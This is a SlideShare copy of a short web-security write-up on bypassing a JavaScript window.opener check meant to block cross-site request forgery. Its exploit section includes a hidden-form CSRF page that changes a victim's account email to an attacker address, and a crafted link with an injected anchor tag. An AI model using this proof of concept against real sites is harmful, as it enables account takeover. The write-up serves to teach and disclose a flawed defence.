SlideShare a Scribd company logo
1 of 7
Download to read offline
| Abusing Windows Opener To Bypass CSRF Protection | | Narendra Bhati | Page 1
Abusing Windows Opener to Bypass CSRF
Protection
(Never Relay On Client Side)
Narendra Bhati
@NarendraBhatiB
http://websecgeeks.com
| Abusing Windows Opener To Bypass CSRF Protection | | Narendra Bhati | Page 2
Contents
1. Abstract..........................................................................................................................................................3
2. Introduction ................................................................................................................................................3
3. Analysis..........................................................................................................................................................4
4. Exploiting .....................................................................................................................................................6
5. Conclusion....................................................................................................................................................7
| Abusing Windows Opener To Bypass CSRF Protection | | Narendra Bhati | Page 3
1. Abstract
Due to the increase in use of Modern Web Application, Security is the main concern. For
security the developer mostly relay on Client Side Validation Mechanism. Those security
features makes web application more flexible and perform better but it comes with great
cost.
The client side validation is easy to bypass so 70% of web applications are vulnerable due
client side validation mechanism.
While I was working on a Web Application, I came across to an interesting security
mechanism which prevent the CSRF Attack.
2. Introduction
If we are talking about CSRF Protection, Then basically we think about 3 Fixes.
1) Referrer Check
2) Random Tokens Form Based
3) Cookie Based Random Tokens
Now the CSRF protection which I am talking about right now was deployed by using a
JavaScript Code, Which was totally on client side due to JavaScript nature.
| Abusing Windows Opener To Bypass CSRF Protection | | Narendra Bhati | Page 4
3. Analysis
As we can see the HTTP Header
POST /home/accountsettings HTTP/1.1
Host: websecgeeks.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101
Firefox/36.0
Referer: http://websecgeeks.com/
Connection: keep-alive
Content-Length: 57
newemail=attacker@something.com&Submit=Save
We can say that this code might be vulnerable to CSRF, as there is no Random Tokens exist. So I
tried to test it by creating an html page like this
<html>
<body>
<form action=”http://websecgeeks.com/home/accountsettings” method=”POST”>
<input type=”hidden” name=”newemail” value=”attacker@attacker.com” />
<input type=”hidden” name=”Submit” value=”Save” />
<input type=”submit” value=”Submit form” />
</form>
</body>
</html>
But when I execute this page in an authenticated session, the application logged out me
immediately. I tried one more time and again the application logged out me.
May be this application is validating the Referrer Value, so I manually added valid
referrer value. But Application logged me out again.
| Abusing Windows Opener To Bypass CSRF Protection | | Narendra Bhati | Page 5
After some time I found an interesting JavaScript Code which was reason behind this
protection.
The Code Was Like Below
<script>
if(window.opener ==null){
top.location.href=”/homedirectory/logoutuser”;
}
</script>
As we can see the code, we can clearly say that this code is looking for a windows opener
value. If the opener value is equal to "null" then application will simply logged us out
and terminate the session, which was very pretty if we talk about CSRF.
According to Windows Opener Description.
When a window is opened from another window, it maintains a reference to that first
window as window.opener. If the current window has no opener, this method returns
NULL. Windows Phone browser does not support window.opener. It is also not
supported in IE if the opener is in a different security zone.
Now anyhow we have to set the windows opener value to while doing CSRF attack.
| Abusing Windows Opener To Bypass CSRF Protection | | Narendra Bhati | Page 6
4. Exploiting
After analysis, I found a way from where we can create an Opener Value which is HREF
HTML Tag.
So I created two pages
1) xss.php
2) csrf3.html
1) Both pages are hosted on attacker web server, Currently assume as “localhost”
"xss.php" is the page where I create a HREF link to the "csrf3.html"
“xss.php” is passing a parameter called “zip” as GET method. Basically I keep the “zip”
as un-filtered, so whatever you inject in this, will display on page as it as. So I injected
the HREF TAG as Below
<a href="http://127.0.0.1/csrf3.html">Link For Target Application</a>
2) The second csrf3.html page will be like this as we seen in previous.
<html>
<body>
<form action=”http://websecgeeks.com/home/accountsettings”
method=”POST”>
<input type=”hidden” name=”newemail” value=”attacker@attacker.com”
/>
<input type=”hidden” name=”Submit” value=”Save” />
<input type=”submit” value=”Submit form” />
</form>
</body>
</html>
And final URL which should be sent to victim is
http://127.0.0.1/xss.php?zip=<a href="http://127.0.0.1/csrf3.html">Link For Target
Application</a>
| Abusing Windows Opener To Bypass CSRF Protection | | Narendra Bhati | Page 7
Below you can see the screen shot.
3. Now I am set. After clicking the Link given as HREF tag, I was able to open a new
page in new tab without getting logout, and also able to Bypass the CSRF Security.
5. Conclusion
As we already know that client side security is not a good idea. After this demonstration we can say
that creating new idea about preventing web application attacks is pretty good, but it is important
that how we implement them.

More Related Content

What's hot

OAuth Hacks A gentle introduction to OAuth 2 and Apache Oltu
OAuth Hacks A gentle introduction to OAuth 2 and Apache OltuOAuth Hacks A gentle introduction to OAuth 2 and Apache Oltu
OAuth Hacks A gentle introduction to OAuth 2 and Apache Oltu
Antonio Sanso
 

What's hot (20)

Top 10 Security Vulnerabilities (2006)
Top 10 Security Vulnerabilities (2006)Top 10 Security Vulnerabilities (2006)
Top 10 Security Vulnerabilities (2006)
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protection
 
Security In PHP Applications
Security In PHP ApplicationsSecurity In PHP Applications
Security In PHP Applications
 
Same Origin Policy Weaknesses
Same Origin Policy WeaknessesSame Origin Policy Weaknesses
Same Origin Policy Weaknesses
 
OAuth Hacks A gentle introduction to OAuth 2 and Apache Oltu
OAuth Hacks A gentle introduction to OAuth 2 and Apache OltuOAuth Hacks A gentle introduction to OAuth 2 and Apache Oltu
OAuth Hacks A gentle introduction to OAuth 2 and Apache Oltu
 
Static Analysis: The Art of Fighting without Fighting
Static Analysis: The Art of Fighting without FightingStatic Analysis: The Art of Fighting without Fighting
Static Analysis: The Art of Fighting without Fighting
 
Django (Web Applications that are Secure by Default)
Django �(Web Applications that are Secure by Default�)Django �(Web Applications that are Secure by Default�)
Django (Web Applications that are Secure by Default)
 
Hacker's Practice Ground - Wall of Sheep workshops - Defcon 2015
Hacker's Practice Ground - Wall of Sheep workshops - Defcon 2015 Hacker's Practice Ground - Wall of Sheep workshops - Defcon 2015
Hacker's Practice Ground - Wall of Sheep workshops - Defcon 2015
 
Flashack
FlashackFlashack
Flashack
 
APIDOC In A Nutshell
APIDOC In A NutshellAPIDOC In A Nutshell
APIDOC In A Nutshell
 
Hunting for security bugs in AEM webapps
Hunting for security bugs in AEM webappsHunting for security bugs in AEM webapps
Hunting for security bugs in AEM webapps
 
Threat Hunting Web Shells Using Splunk
Threat Hunting Web Shells Using SplunkThreat Hunting Web Shells Using Splunk
Threat Hunting Web Shells Using Splunk
 
Filter Evasion: Houdini on the Wire
Filter Evasion: Houdini on the WireFilter Evasion: Houdini on the Wire
Filter Evasion: Houdini on the Wire
 
Web-servers & Application Hacking
Web-servers & Application HackingWeb-servers & Application Hacking
Web-servers & Application Hacking
 
Examining And Bypassing The IE8 XSS Filter
Examining And Bypassing The IE8 XSS FilterExamining And Bypassing The IE8 XSS Filter
Examining And Bypassing The IE8 XSS Filter
 
Hack and Slash: Secure Coding
Hack and Slash: Secure CodingHack and Slash: Secure Coding
Hack and Slash: Secure Coding
 
Web Security - OWASP - SQL injection & Cross Site Scripting XSS
Web Security - OWASP - SQL injection & Cross Site Scripting XSSWeb Security - OWASP - SQL injection & Cross Site Scripting XSS
Web Security - OWASP - SQL injection & Cross Site Scripting XSS
 
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
 
MITM Attacks on HTTPS: Another Perspective
MITM Attacks on HTTPS: Another PerspectiveMITM Attacks on HTTPS: Another Perspective
MITM Attacks on HTTPS: Another Perspective
 
Writing automation tests with python selenium behave pageobjects
Writing automation tests with python selenium behave pageobjectsWriting automation tests with python selenium behave pageobjects
Writing automation tests with python selenium behave pageobjects
 

Viewers also liked

LHW Scope of work
LHW Scope of workLHW Scope of work
LHW Scope of work
Altaf Sonia
 

Viewers also liked (16)

Introducción al cómputo en la nube
Introducción al cómputo en la nubeIntroducción al cómputo en la nube
Introducción al cómputo en la nube
 
LHW Scope of work
LHW Scope of workLHW Scope of work
LHW Scope of work
 
4 Symphonies
4 Symphonies4 Symphonies
4 Symphonies
 
new doc 8 (1)
new doc 8 (1)new doc 8 (1)
new doc 8 (1)
 
Report 130501
Report 130501Report 130501
Report 130501
 
Tpartes del teclado
Tpartes del tecladoTpartes del teclado
Tpartes del teclado
 
Hiperbola
HiperbolaHiperbola
Hiperbola
 
Acuerdo no. ca 002 2010
Acuerdo no. ca 002   2010Acuerdo no. ca 002   2010
Acuerdo no. ca 002 2010
 
Eminent company&amp;products profile -total
Eminent company&amp;products profile -totalEminent company&amp;products profile -total
Eminent company&amp;products profile -total
 
Building and Maintaining Open Source Project - YWC14
Building and Maintaining Open Source Project - YWC14Building and Maintaining Open Source Project - YWC14
Building and Maintaining Open Source Project - YWC14
 
Emergency procedure at height
Emergency procedure at heightEmergency procedure at height
Emergency procedure at height
 
Família- Sociologia 12ºAno
Família- Sociologia 12ºAnoFamília- Sociologia 12ºAno
Família- Sociologia 12ºAno
 
Tecnica e instrumento de evaluacion
Tecnica e instrumento de evaluacionTecnica e instrumento de evaluacion
Tecnica e instrumento de evaluacion
 
सत्र ३-४ सुशासन
सत्र ३-४   सुशासन सत्र ३-४   सुशासन
सत्र ३-४ सुशासन
 
Sunqu Catálogo Perfiles
Sunqu Catálogo Perfiles Sunqu Catálogo Perfiles
Sunqu Catálogo Perfiles
 
Escala likert randall corrales montoya
Escala likert   randall corrales montoyaEscala likert   randall corrales montoya
Escala likert randall corrales montoya
 

Similar to Abusing Windows Opener To Bypass CSRF Protection

xss-100908063522-phpapp02.pdf
xss-100908063522-phpapp02.pdfxss-100908063522-phpapp02.pdf
xss-100908063522-phpapp02.pdf
yashvirsingh48
 
A4 A K S H A Y B H A R D W A J
A4    A K S H A Y  B H A R D W A JA4    A K S H A Y  B H A R D W A J
A4 A K S H A Y B H A R D W A J
bhardwajakshay
 
Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009
mirahman
 

Similar to Abusing Windows Opener To Bypass CSRF Protection (20)

Evolution Of Web Security
Evolution Of Web SecurityEvolution Of Web Security
Evolution Of Web Security
 
04. xss and encoding
04.  xss and encoding04.  xss and encoding
04. xss and encoding
 
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
 
XSS
XSSXSS
XSS
 
Micro frontends
Micro frontendsMicro frontends
Micro frontends
 
Understanding dom based xss
Understanding dom based xssUnderstanding dom based xss
Understanding dom based xss
 
Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek
Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka IrongeekMutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek
Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek
 
Linkedin.com DomXss 04-08-2014
Linkedin.com DomXss 04-08-2014Linkedin.com DomXss 04-08-2014
Linkedin.com DomXss 04-08-2014
 
Everybody loves html5,h4ck3rs too
Everybody loves html5,h4ck3rs tooEverybody loves html5,h4ck3rs too
Everybody loves html5,h4ck3rs too
 
Advanced xss
Advanced xssAdvanced xss
Advanced xss
 
xss-100908063522-phpapp02.pdf
xss-100908063522-phpapp02.pdfxss-100908063522-phpapp02.pdf
xss-100908063522-phpapp02.pdf
 
Web Application Security in Rails
Web Application Security in RailsWeb Application Security in Rails
Web Application Security in Rails
 
Secure java script-for-developers
Secure java script-for-developersSecure java script-for-developers
Secure java script-for-developers
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)
 
XSS Injection Vulnerabilities
XSS Injection VulnerabilitiesXSS Injection Vulnerabilities
XSS Injection Vulnerabilities
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
 
A4 A K S H A Y B H A R D W A J
A4    A K S H A Y  B H A R D W A JA4    A K S H A Y  B H A R D W A J
A4 A K S H A Y B H A R D W A J
 
Web Application Security in front end
Web Application Security in front endWeb Application Security in front end
Web Application Security in front end
 
Cross-Site Scripting course made by Cristian Alexandrescu
Cross-Site Scripting course made by Cristian Alexandrescu Cross-Site Scripting course made by Cristian Alexandrescu
Cross-Site Scripting course made by Cristian Alexandrescu
 
Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009
 

Recently uploaded

Recently uploaded (20)

AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
Tech Trends Report 2024 Future Today Institute.pdf
Tech Trends Report 2024 Future Today Institute.pdfTech Trends Report 2024 Future Today Institute.pdf
Tech Trends Report 2024 Future Today Institute.pdf
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdf
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Developing An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of BrazilDeveloping An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of Brazil
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 

Abusing Windows Opener To Bypass CSRF Protection

  • 1. | Abusing Windows Opener To Bypass CSRF Protection | | Narendra Bhati | Page 1 Abusing Windows Opener to Bypass CSRF Protection (Never Relay On Client Side) Narendra Bhati @NarendraBhatiB http://websecgeeks.com
  • 2. | Abusing Windows Opener To Bypass CSRF Protection | | Narendra Bhati | Page 2 Contents 1. Abstract..........................................................................................................................................................3 2. Introduction ................................................................................................................................................3 3. Analysis..........................................................................................................................................................4 4. Exploiting .....................................................................................................................................................6 5. Conclusion....................................................................................................................................................7
  • 3. | Abusing Windows Opener To Bypass CSRF Protection | | Narendra Bhati | Page 3 1. Abstract Due to the increase in use of Modern Web Application, Security is the main concern. For security the developer mostly relay on Client Side Validation Mechanism. Those security features makes web application more flexible and perform better but it comes with great cost. The client side validation is easy to bypass so 70% of web applications are vulnerable due client side validation mechanism. While I was working on a Web Application, I came across to an interesting security mechanism which prevent the CSRF Attack. 2. Introduction If we are talking about CSRF Protection, Then basically we think about 3 Fixes. 1) Referrer Check 2) Random Tokens Form Based 3) Cookie Based Random Tokens Now the CSRF protection which I am talking about right now was deployed by using a JavaScript Code, Which was totally on client side due to JavaScript nature.
  • 4. | Abusing Windows Opener To Bypass CSRF Protection | | Narendra Bhati | Page 4 3. Analysis As we can see the HTTP Header POST /home/accountsettings HTTP/1.1 Host: websecgeeks.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Referer: http://websecgeeks.com/ Connection: keep-alive Content-Length: 57 newemail=attacker@something.com&Submit=Save We can say that this code might be vulnerable to CSRF, as there is no Random Tokens exist. So I tried to test it by creating an html page like this <html> <body> <form action=”http://websecgeeks.com/home/accountsettings” method=”POST”> <input type=”hidden” name=”newemail” value=”attacker@attacker.com” /> <input type=”hidden” name=”Submit” value=”Save” /> <input type=”submit” value=”Submit form” /> </form> </body> </html> But when I execute this page in an authenticated session, the application logged out me immediately. I tried one more time and again the application logged out me. May be this application is validating the Referrer Value, so I manually added valid referrer value. But Application logged me out again.
  • 5. | Abusing Windows Opener To Bypass CSRF Protection | | Narendra Bhati | Page 5 After some time I found an interesting JavaScript Code which was reason behind this protection. The Code Was Like Below <script> if(window.opener ==null){ top.location.href=”/homedirectory/logoutuser”; } </script> As we can see the code, we can clearly say that this code is looking for a windows opener value. If the opener value is equal to "null" then application will simply logged us out and terminate the session, which was very pretty if we talk about CSRF. According to Windows Opener Description. When a window is opened from another window, it maintains a reference to that first window as window.opener. If the current window has no opener, this method returns NULL. Windows Phone browser does not support window.opener. It is also not supported in IE if the opener is in a different security zone. Now anyhow we have to set the windows opener value to while doing CSRF attack.
  • 6. | Abusing Windows Opener To Bypass CSRF Protection | | Narendra Bhati | Page 6 4. Exploiting After analysis, I found a way from where we can create an Opener Value which is HREF HTML Tag. So I created two pages 1) xss.php 2) csrf3.html 1) Both pages are hosted on attacker web server, Currently assume as “localhost” "xss.php" is the page where I create a HREF link to the "csrf3.html" “xss.php” is passing a parameter called “zip” as GET method. Basically I keep the “zip” as un-filtered, so whatever you inject in this, will display on page as it as. So I injected the HREF TAG as Below <a href="http://127.0.0.1/csrf3.html">Link For Target Application</a> 2) The second csrf3.html page will be like this as we seen in previous. <html> <body> <form action=”http://websecgeeks.com/home/accountsettings” method=”POST”> <input type=”hidden” name=”newemail” value=”attacker@attacker.com” /> <input type=”hidden” name=”Submit” value=”Save” /> <input type=”submit” value=”Submit form” /> </form> </body> </html> And final URL which should be sent to victim is http://127.0.0.1/xss.php?zip=<a href="http://127.0.0.1/csrf3.html">Link For Target Application</a>
  • 7. | Abusing Windows Opener To Bypass CSRF Protection | | Narendra Bhati | Page 7 Below you can see the screen shot. 3. Now I am set. After clicking the Link given as HREF tag, I was able to open a new page in new tab without getting logout, and also able to Bypass the CSRF Security. 5. Conclusion As we already know that client side security is not a good idea. After this demonstration we can say that creating new idea about preventing web application attacks is pretty good, but it is important that how we implement them.